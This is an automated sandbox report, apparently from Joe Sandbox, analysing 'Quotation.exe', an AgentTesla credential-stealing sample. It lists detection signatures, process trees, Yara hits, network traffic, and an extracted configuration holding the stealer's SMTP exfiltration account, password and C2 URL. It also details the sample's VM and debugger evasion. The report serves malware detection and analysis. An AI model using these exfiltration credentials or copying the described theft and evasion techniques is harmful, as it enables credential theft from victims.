Loading ...

Play interactive tourEdit tour

Analysis Report Quotation.exe

Overview

General Information

Sample Name:Quotation.exe
Analysis ID:339119
MD5:c478a9dd6e72ac0e96aa0bd90d7b9ec2
SHA1:e9084e9ccbcfb91547d292be1e76985b353d7ecd
SHA256:e178d0ed3b308beca605b9b5f71fd420bb438dc2c12e37523982982d57df22a3
Tags:exe

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
.NET source code contains very large array initializations
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • Quotation.exe (PID: 6084 cmdline: 'C:\Users\user\Desktop\Quotation.exe' MD5: C478A9DD6E72AC0E96AA0BD90D7B9EC2)
    • Quotation.exe (PID: 5288 cmdline: 'C:\Users\user\Desktop\Quotation.exe' MD5: C478A9DD6E72AC0E96AA0BD90D7B9EC2)
    • Quotation.exe (PID: 5824 cmdline: C:\Users\user\Desktop\Quotation.exe MD5: C478A9DD6E72AC0E96AA0BD90D7B9EC2)
      • Quotation.exe (PID: 5852 cmdline: C:\Users\user\Desktop\Quotation.exe MD5: C478A9DD6E72AC0E96AA0BD90D7B9EC2)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "rOPNbWS", "URL: ": "https://OKmk0UVQzAElqL6wiCX.net", "To: ": "mauro.aguiari@tthyssenkrupp.com", "ByHost: ": "smtp.tthyssenkrupp.com:587", "Password: ": "4nH0rm", "From: ": "mauro.aguiari@tthyssenkrupp.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.588164369.0000000000F39000.00000004.00000020.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000002.00000002.233917057.0000000000B80000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000003.00000002.589076176.0000000002AE2000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000003.00000002.585204726.0000000000400000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000003.00000002.589457084.0000000002B61000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 8 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.Quotation.exe.2970000.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              3.2.Quotation.exe.2970000.4.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                2.2.Quotation.exe.b80000.1.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  3.2.Quotation.exe.400000.0.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    2.2.Quotation.exe.b80000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 4 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus / Scanner detection for submitted sampleShow sources
                      Source: Quotation.exeAvira: detected
                      Found malware configurationShow sources
                      Source: Quotation.exe.5852.3.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "rOPNbWS", "URL: ": "https://OKmk0UVQzAElqL6wiCX.net", "To: ": "mauro.aguiari@tthyssenkrupp.com", "ByHost: ": "smtp.tthyssenkrupp.com:587", "Password: ": "4nH0rm", "From: ": "mauro.aguiari@tthyssenkrupp.com"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: Quotation.exeVirustotal: Detection: 36%Perma Link
                      Source: Quotation.exeReversingLabs: Detection: 43%
                      Machine Learning detection for sampleShow sources
                      Source: Quotation.exeJoe Sandbox ML: detected
                      Source: 3.2.Quotation.exe.2ae0000.5.unpackAvira: Label: TR/Spy.Gen8
                      Source: 3.2.Quotation.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: Quotation.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: Quotation.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: wntdll.pdbUGP source: Quotation.exe, 00000000.00000003.224530072.000000001ACF0000.00000004.00000001.sdmp, Quotation.exe, 00000002.00000003.229337012.000000001A430000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: Quotation.exe, 00000000.00000003.224530072.000000001ACF0000.00000004.00000001.sdmp, Quotation.exe, 00000002.00000003.229337012.000000001A430000.00000004.00000001.sdmp
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_00404A29 FindFirstFileExW,3_2_00404A29

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49745 -> 208.91.199.223:587
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorURLs: https://OKmk0UVQzAElqL6wiCX.net
                      Source: global trafficTCP traffic: 192.168.2.3:49745 -> 208.91.199.223:587
                      Source: Joe Sandbox ViewIP Address: 208.91.199.223 208.91.199.223
                      Source: global trafficTCP traffic: 192.168.2.3:49745 -> 208.91.199.223:587
                      Source: unknownDNS traffic detected: queries for: smtp.tthyssenkrupp.com
                      Source: Quotation.exe, 00000003.00000002.589457084.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: Quotation.exe, 00000003.00000002.589457084.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: Quotation.exe, 00000003.00000002.589457084.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://ShQsty.com
                      Source: Quotation.exe, 00000003.00000002.591947363.0000000002E76000.00000004.00000001.sdmpString found in binary or memory: http://smtp.tthyssenkrupp.com
                      Source: Quotation.exe, 00000003.00000002.591947363.0000000002E76000.00000004.00000001.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                      Source: Quotation.exe, 00000003.00000002.589457084.0000000002B61000.00000004.00000001.sdmp, Quotation.exe, 00000003.00000002.591997459.0000000002E86000.00000004.00000001.sdmpString found in binary or memory: https://OKmk0UVQzAElqL6wiCX.net
                      Source: Quotation.exe, 00000003.00000002.589457084.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%$
                      Source: Quotation.exe, 00000003.00000002.589457084.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: Quotation.exeString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: Quotation.exe, 00000003.00000002.589457084.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: Quotation.exe, 00000000.00000002.226057088.00000000011FA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      System Summary:

                      barindex
                      .NET source code contains very large array initializationsShow sources
                      Source: 3.2.Quotation.exe.2ae0000.5.unpack, u003cPrivateImplementationDetailsu003eu007bCA5ED4A4u002d7A41u002d40CAu002d9BB4u002dFA1A7DF33EE0u007d/u0032041D7CDu002d063Cu002d4ABFu002d9CEBu002dB28F8E9C6A58.csLarge array initialization: .cctor: array initializer size 11966
                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: Quotation.exe
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00BF60C00_2_00BF60C0
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00BF683C0_2_00BF683C
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00BF04320_2_00BF0432
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00BF51BC0_2_00BF51BC
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00BF79910_2_00BF7991
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00BF55E00_2_00BF55E0
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00BED9290_2_00BED929
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00BEA9510_2_00BEA951
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00BF5B500_2_00BF5B50
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF60C01_2_00BF60C0
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF683C1_2_00BF683C
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF04321_2_00BF0432
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF51BC1_2_00BF51BC
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF79911_2_00BF7991
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF55E01_2_00BF55E0
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BED9291_2_00BED929
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BEA9511_2_00BEA951
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF5B501_2_00BF5B50
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_0040A2A53_2_0040A2A5
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_029546A03_2_029546A0
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_029546903_2_02954690
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_029546723_2_02954672
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: String function: 00BE715C appears 370 times
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: String function: 00BE6F06 appears 36 times
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: String function: 00BE7021 appears 40 times
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: String function: 00BE9160 appears 64 times
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: String function: 00BE6EF1 appears 84 times
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: String function: 00BEBFC3 appears 38 times
                      Source: Quotation.exe, 00000000.00000002.225849639.0000000000DF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemsvfw32.dll.muij% vs Quotation.exe
                      Source: Quotation.exe, 00000000.00000003.224665367.000000001AE06000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Quotation.exe
                      Source: Quotation.exe, 00000000.00000002.226102208.0000000002D90000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDPUbepHNnATxXoHoUzhqZlOwJIdHMAIuMyV.exe4 vs Quotation.exe
                      Source: Quotation.exe, 00000002.00000003.233132793.000000001A59F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Quotation.exe
                      Source: Quotation.exe, 00000002.00000002.233917057.0000000000B80000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDPUbepHNnATxXoHoUzhqZlOwJIdHMAIuMyV.exe4 vs Quotation.exe
                      Source: Quotation.exeBinary or memory string: OriginalFilename vs Quotation.exe
                      Source: Quotation.exe, 00000003.00000002.588164369.0000000000F39000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameDPUbepHNnATxXoHoUzhqZlOwJIdHMAIuMyV.exe4 vs Quotation.exe
                      Source: Quotation.exe, 00000003.00000002.585774836.0000000000B68000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Quotation.exe
                      Source: Quotation.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: 3.2.Quotation.exe.2ae0000.5.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 3.2.Quotation.exe.2ae0000.5.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/0@2/1
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,3_2_00401489
                      Source: C:\Users\user\Desktop\Quotation.exeCommand line argument: Kernel32.dll0_2_00BE1040
                      Source: C:\Users\user\Desktop\Quotation.exeCommand line argument: User32.dll0_2_00BE1040
                      Source: C:\Users\user\Desktop\Quotation.exeCommand line argument: User32.dll0_2_00BE1040
                      Source: C:\Users\user\Desktop\Quotation.exeCommand line argument: IEUCIZEO0_2_00BE1040
                      Source: C:\Users\user\Desktop\Quotation.exeCommand line argument: Kernel32.dll1_2_00BE1040
                      Source: C:\Users\user\Desktop\Quotation.exeCommand line argument: User32.dll1_2_00BE1040
                      Source: C:\Users\user\Desktop\Quotation.exeCommand line argument: User32.dll1_2_00BE1040
                      Source: C:\Users\user\Desktop\Quotation.exeCommand line argument: IEUCIZEO1_2_00BE1040
                      Source: Quotation.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Quotation.exeVirustotal: Detection: 36%
                      Source: Quotation.exeReversingLabs: Detection: 43%
                      Source: C:\Users\user\Desktop\Quotation.exeFile read: C:\Users\user\Desktop\Quotation.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Quotation.exe 'C:\Users\user\Desktop\Quotation.exe'
                      Source: unknownProcess created: C:\Users\user\Desktop\Quotation.exe 'C:\Users\user\Desktop\Quotation.exe'
                      Source: unknownProcess created: C:\Users\user\Desktop\Quotation.exe C:\Users\user\Desktop\Quotation.exe
                      Source: unknownProcess created: C:\Users\user\Desktop\Quotation.exe C:\Users\user\Desktop\Quotation.exe
                      Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Users\user\Desktop\Quotation.exe 'C:\Users\user\Desktop\Quotation.exe' Jump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Users\user\Desktop\Quotation.exe C:\Users\user\Desktop\Quotation.exeJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Users\user\Desktop\Quotation.exe C:\Users\user\Desktop\Quotation.exeJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Quotation.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: wntdll.pdbUGP source: Quotation.exe, 00000000.00000003.224530072.000000001ACF0000.00000004.00000001.sdmp, Quotation.exe, 00000002.00000003.229337012.000000001A430000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: Quotation.exe, 00000000.00000003.224530072.000000001ACF0000.00000004.00000001.sdmp, Quotation.exe, 00000002.00000003.229337012.000000001A430000.00000004.00000001.sdmp
                      Source: Quotation.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: Quotation.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: Quotation.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: Quotation.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: Quotation.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00BF1B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00BF1B13
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00BE91A5 push ecx; ret 0_2_00BE91B8
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BE91A5 push ecx; ret 1_2_00BE91B8
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_00401F16 push ecx; ret 3_2_00401F29
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_00ECD85C push eax; retf 3_2_00ECD85D
                      Source: C:\Users\user\Desktop\Quotation.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeWindow / User API: threadDelayed 7113Jump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeWindow / User API: threadDelayed 2684Jump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exe TID: 5776Thread sleep time: -22136092888451448s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exe TID: 5808Thread sleep count: 7113 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exe TID: 5808Thread sleep count: 2684 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exe TID: 5776Thread sleep count: 46 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_00404A29 FindFirstFileExW,3_2_00404A29
                      Source: Quotation.exe, 00000003.00000002.595238686.0000000006137000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\Quotation.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00BE8A1C _memset,IsDebuggerPresent,0_2_00BE8A1C
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00BF1B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00BF1B13
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00BF1B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00BF1B13
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00BE6A00 mov eax, dword ptr fs:[00000030h]0_2_00BE6A00
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00D4F471 mov eax, dword ptr fs:[00000030h]0_2_00D4F471
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00D4F40E mov eax, dword ptr fs:[00000030h]0_2_00D4F40E
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00D4F5B9 mov eax, dword ptr fs:[00000030h]0_2_00D4F5B9
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00D4F3D1 mov eax, dword ptr fs:[00000030h]0_2_00D4F3D1
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00D4EB62 mov eax, dword ptr fs:[00000030h]0_2_00D4EB62
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BE6A00 mov eax, dword ptr fs:[00000030h]1_2_00BE6A00
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 2_2_003DF735 mov eax, dword ptr fs:[00000030h]2_2_003DF735
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 2_2_003DF58A mov eax, dword ptr fs:[00000030h]2_2_003DF58A
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 2_2_003DF5ED mov eax, dword ptr fs:[00000030h]2_2_003DF5ED
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 2_2_003DECDE mov eax, dword ptr fs:[00000030h]2_2_003DECDE
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 2_2_003DF54D mov eax, dword ptr fs:[00000030h]2_2_003DF54D
